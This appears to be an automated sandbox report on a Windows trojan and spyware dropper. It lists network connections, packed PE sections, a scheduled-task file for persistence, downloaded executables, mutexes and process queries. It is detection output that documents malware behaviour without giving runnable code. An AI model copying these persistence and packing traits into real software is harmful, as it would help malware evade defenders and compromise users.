Source: unknown Network traffic detected: HTTP traffic on port 49811 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50017
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50019
Source: unknown Network traffic detected: HTTP traffic on port 49813 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49676 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49951 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50032 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50010
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50131
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50130
Source: unknown Network traffic detected: HTTP traffic on port 49836 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50012
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50011
Source: unknown Network traffic detected: HTTP traffic on port 50055 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50132
Source: unknown HTTPS traffic detected: 172.202.163.200:443 -> 192.168.2.8:49704 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.202.163.200:443 -> 192.168.2.8:49708 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.8:49712 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.8:49714 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.8:49716 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.8:49717 version: TLS 1.2
Source: unknown HTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.8:49718 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.8:49720 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.8:49729 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.8:49736 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.8:49742 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.8:49743 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.8:49761 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.8:49763 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.8:49772 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.8:49777 version: TLS 1.2
Source: unknown HTTPS traffic detected: 2.23.161.164:443 -> 192.168.2.8:49776 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.8:49786 version: TLS 1.2
Source: unknown HTTPS traffic detected: 2.23.161.164:443 -> 192.168.2.8:49787 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.8:49788 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.8:49796 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.8:49808 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.8:49815 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.8:49836 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.8:49914 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.8:49915 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.8:49919 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.8:49928 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.8:49932 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.8:49943 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.8:49942 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.8:49944 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.8:49941 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.8:50012 version: TLS 1.2
Source: unknown HTTPS traffic detected: 151.101.1.91:443 -> 192.168.2.8:50015 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.8:50014 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.8:50020 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.8:50023 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.8:50021 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.8:50022 version: TLS 1.2
Source: unknown HTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.8:50050 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.8:50103 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.8:50099 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.8:50102 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.8:50104 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.8:50100 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.8:50101 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.8:50107 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.8:50108 version: TLS 1.2
Source: unknown HTTPS traffic detected: 52.168.112.67:443 -> 192.168.2.8:50174 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.8:50176 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.8:50177 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.8:50178 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.8:50181 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.8:50179 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.8:50180 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.8:50182 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.8:50184 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.8:50183 version: TLS 1.2

System Summary
barindex
Binary is likely a compiled AutoIt script file
Source: d146970153.exe, 0000000C.00000002.2347191221.0000000000C92000.00000002.00000001.01000000.0000000B.sdmp String found in binary or memory: This is a third-party compiled AutoIt script. memstr_be44175a-6
Source: d146970153.exe, 0000000C.00000002.2347191221.0000000000C92000.00000002.00000001.01000000.0000000B.sdmp String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer memstr_bdaef2d6-3
PE file contains section with special chars
Source: 2fQ8fpTWAP.exe Static PE information: section name:
Source: 2fQ8fpTWAP.exe Static PE information: section name: .idata
Source: 2fQ8fpTWAP.exe Static PE information: section name:
Source: skotes.exe.0.dr Static PE information: section name:
Source: skotes.exe.0.dr Static PE information: section name: .idata
Source: skotes.exe.0.dr Static PE information: section name:
Source: random[1].exe.7.dr Static PE information: section name:
Source: random[1].exe.7.dr Static PE information: section name: .idata
Source: random[1].exe.7.dr Static PE information: section name:
Source: f20b4c0961.exe.7.dr Static PE information: section name:
Source: f20b4c0961.exe.7.dr Static PE information: section name: .idata
Source: f20b4c0961.exe.7.dr Static PE information: section name:
Source: random[1].exe0.7.dr Static PE information: section name:
Source: random[1].exe0.7.dr Static PE information: section name: .idata
Source: random[1].exe0.7.dr Static PE information: section name:
Source: e2af9f55fd.exe.7.dr Static PE information: section name:
Source: e2af9f55fd.exe.7.dr Static PE information: section name: .idata
Source: e2af9f55fd.exe.7.dr Static PE information: section name:
Source: random[2].exe.7.dr Static PE information: section name:
Source: random[2].exe.7.dr Static PE information: section name: .idata
Source: 44452951d3.exe.7.dr Static PE information: section name:
Source: 44452951d3.exe.7.dr Static PE information: section name: .idata
Abnormal high CPU Usage
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process Stats: CPU usage > 49%
Creates files inside the system directory
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe File created: C:\Windows\Tasks\skotes.job Jump to behavior
Detected potential crypto function
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe Code function: 9_3_0119E0B8 9_3_0119E0B8
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe Code function: 9_3_0119E0B8 9_3_0119E0B8
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe Code function: 9_3_0119E0B8 9_3_0119E0B8
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe Code function: 9_3_0119E0B8 9_3_0119E0B8
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe Code function: 11_3_006BDCE6 11_3_006BDCE6
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe Code function: 11_3_006BDCE6 11_3_006BDCE6
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe Code function: 11_3_006BD377 11_3_006BD377
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe Code function: 11_3_006BD377 11_3_006BD377
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe Code function: 11_3_006BDCE6 11_3_006BDCE6
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe Code function: 11_3_006BDCE6 11_3_006BDCE6
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe Code function: 11_3_006BD377 11_3_006BD377
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe Code function: 11_3_006BD377 11_3_006BD377
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe Code function: 11_2_05C31DDD 11_2_05C31DDD
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe Code function: 11_2_05C09DF4 11_2_05C09DF4
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe Code function: 11_2_05C0A5F6 11_2_05C0A5F6
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe Code function: 11_2_05C495FE 11_2_05C495FE
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe Code function: 11_2_05C52585 11_2_05C52585
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe Code function: 11_2_05C4F597 11_2_05C4F597
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe Code function: 11_2_05C22D9F 11_2_05C22D9F
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe Code function: 11_2_05C1F5B6 11_2_05C1F5B6
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe Code function: 11_2_05C335BB 11_2_05C335BB
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe Code function: 11_2_05C405BE 11_2_05C405BE
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe Code function: 11_2_05C05D43 11_2_05C05D43
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe Code function: 11_2_05C0AD44 11_2_05C0AD44
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe Code function: 11_2_05C20D48 11_2_05C20D48
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe Code function: 11_2_05C0CD4C 11_2_05C0CD4C
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe Code function: 11_2_05C4D55C 11_2_05C4D55C
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe Code function: 11_2_05C1A55B 11_2_05C1A55B
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe Code function: 11_2_05C30D58 11_2_05C30D58
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe Code function: 11_2_05C53D59 11_2_05C53D59
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe Code function: 11_2_05C2856E 11_2_05C2856E
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe Code function: 11_2_05C2DD6F 11_2_05C2DD6F
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe Code function: 11_2_05C0D579 11_2_05C0D579
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe Code function: 11_2_05C2BD79 11_2_05C2BD79
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe Code function: 11_2_05C43501 11_2_05C43501
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe Code function: 11_2_05C22504 11_2_05C22504
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe Code function: 11_2_05C29D0F 11_2_05C29D0F
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe Code function: 11_2_05C3950E 11_2_05C3950E
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe Code function: 11_2_05C21D25 11_2_05C21D25
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe Code function: 11_2_05C10CC4 11_2_05C10CC4
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe Code function: 11_2_05C05CC7 11_2_05C05CC7
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe Code function: 11_2_05C0FCD0 11_2_05C0FCD0
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe Code function: 11_2_05C454DE 11_2_05C454DE
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe Code function: 11_2_05C1CCE0 11_2_05C1CCE0
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe Code function: 11_2_05C42CE0 11_2_05C42CE0
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe Code function: 11_2_05C35CE5 11_2_05C35CE5
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe Code function: 11_2_05C544E3 11_2_05C544E3
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe Code function: 11_2_05C1ECE9 11_2_05C1ECE9
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe Code function: 11_2_05C474F4 11_2_05C474F4
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe Code function: 11_2_05C4E4F6 11_2_05C4E4F6
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe Code function: 11_2_05C26CF1 11_2_05C26CF1
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe Code function: 11_2_05C084F6 11_2_05C084F6
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe Code function: 11_2_05C50481 11_2_05C50481
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe Code function: 11_2_05C3448B 11_2_05C3448B
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe Code function: 11_2_05C15C99 11_2_05C15C99
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe Code function: 11_2_05C2D49A 11_2_05C2D49A
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe Code function: 11_2_05C194AE 11_2_05C194AE
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe Code function: 11_2_05C0C4B4 11_2_05C0C4B4
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe Code function: 11_2_05C4ECBF 11_2_05C4ECBF
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe Code function: 11_2_05C49446 11_2_05C49446
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe Code function: 11_2_05C2CC59 11_2_05C2CC59
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe Code function: 11_2_05C09461 11_2_05C09461
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe Code function: 11_2_05C10474 11_2_05C10474
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe Code function: 11_2_05C3A412 11_2_05C3A412
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe Code function: 11_2_05C4C418 11_2_05C4C418
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe Code function: 11_2_05C11C1C 11_2_05C11C1C
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe Code function: 11_2_05C2EFC4 11_2_05C2EFC4
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe Code function: 11_2_05C2E7C5 11_2_05C2E7C5
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe Code function: 11_2_05C447D9 11_2_05C447D9
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe Code function: 11_2_05C41FE1 11_2_05C41FE1
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe Code function: 11_2_05C11FE8 11_2_05C11FE8
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe Code function: 11_2_05C267EB 11_2_05C267EB
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe Code function: 11_2_05C40FF7 11_2_05C40FF7
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe Code function: 11_2_05C41795 11_2_05C41795
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe Code function: 11_2_05C4FFB9 11_2_05C4FFB9
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe Code function: 11_2_05C4BF4D 11_2_05C4BF4D
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe Code function: 11_2_05C20748 11_2_05C20748
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe Code function: 11_2_05C1DF4A 11_2_05C1DF4A
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe Code function: 11_2_05C1B74D 11_2_05C1B74D
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe Code function: 11_2_05C36F4E 11_2_05C36F4E
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe Code function: 11_2_05C28F66 11_2_05C28F66
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe Code function: 11_2_05C46F63 11_2_05C46F63
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe Code function: 11_2_05C39F74 11_2_05C39F74
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe Code function: 11_2_05C45F12 11_2_05C45F12
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe Code function: 11_2_05C1BF20 11_2_05C1BF20
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe Code function: 11_2_05C49F26 11_2_05C49F26
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe Code function: 11_2_05C27727 11_2_05C27727
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe Code function: 11_2_05C3DF29 11_2_05C3DF29
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe Code function: 11_2_05C08F32 11_2_05C08F32
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe Code function: 11_2_05C2FF3A 11_2_05C2FF3A
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe Code function: 11_2_05C22F39 11_2_05C22F39
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe Code function: 11_2_05C0C73E 11_2_05C0C73E
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe Code function: 11_2_05C13ECA 11_2_05C13ECA
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe Code function: 11_2_05C456C9 11_2_05C456C9
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe Code function: 11_2_05C1FECE 11_2_05C1FECE
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe Code function: 11_2_05C2DED5 11_2_05C2DED5
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe Code function: 11_2_05C466E3 11_2_05C466E3
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe Code function: 11_2_05C3B6ED 11_2_05C3B6ED
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe Code function: 11_2_05C096F2 11_2_05C096F2
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe Code function: 11_2_05C34EFE 11_2_05C34EFE
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe Code function: 11_2_05C17686 11_2_05C17686
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe Code function: 11_2_05C4B696 11_2_05C4B696
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe Code function: 11_2_05C37690 11_2_05C37690
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe Code function: 11_2_05C24695 11_2_05C24695
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe Code function: 11_2_05C3AEA1 11_2_05C3AEA1
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe Code function: 11_2_05C066B7 11_2_05C066B7
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe Code function: 11_2_05C486BB 11_2_05C486BB
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe Code function: 11_2_05C4A6BB 11_2_05C4A6BB
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe Code function: 11_2_05C10E47 11_2_05C10E47
Uses 32bit PE files
Source: 2fQ8fpTWAP.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 2fQ8fpTWAP.exe Static PE information: Section: ZLIB complexity 0.9979564032697548
Source: 2fQ8fpTWAP.exe Static PE information: Section: bwkbkxir ZLIB complexity 0.9947653399589541
Source: skotes.exe.0.dr Static PE information: Section: ZLIB complexity 0.9979564032697548
Source: skotes.exe.0.dr Static PE information: Section: bwkbkxir ZLIB complexity 0.9947653399589541
Source: random[1].exe.7.dr Static PE information: Section: ZLIB complexity 0.9992763831967213
Source: random[1].exe.7.dr Static PE information: Section: xwjcifzz ZLIB complexity 0.9946616550226586
Source: f20b4c0961.exe.7.dr Static PE information: Section: ZLIB complexity 0.9992763831967213
Source: f20b4c0961.exe.7.dr Static PE information: Section: xwjcifzz ZLIB complexity 0.9946616550226586
Source: random[1].exe0.7.dr Static PE information: Section: chbioofn ZLIB complexity 0.9947662911084044
Source: e2af9f55fd.exe.7.dr Static PE information: Section: chbioofn ZLIB complexity 0.9947662911084044
Source: random[1].exe0.7.dr Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: e2af9f55fd.exe.7.dr Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@107/29@49/14
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\random[1].exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008518001\44452951d3.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1532:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7676:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2984:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5956:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4796:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7996:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Mutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7940:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7872:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7108:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7816:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4884:120:WilError_03
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe File created: C:\Users\user\AppData\Local\Temp\abc3bc1985 Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
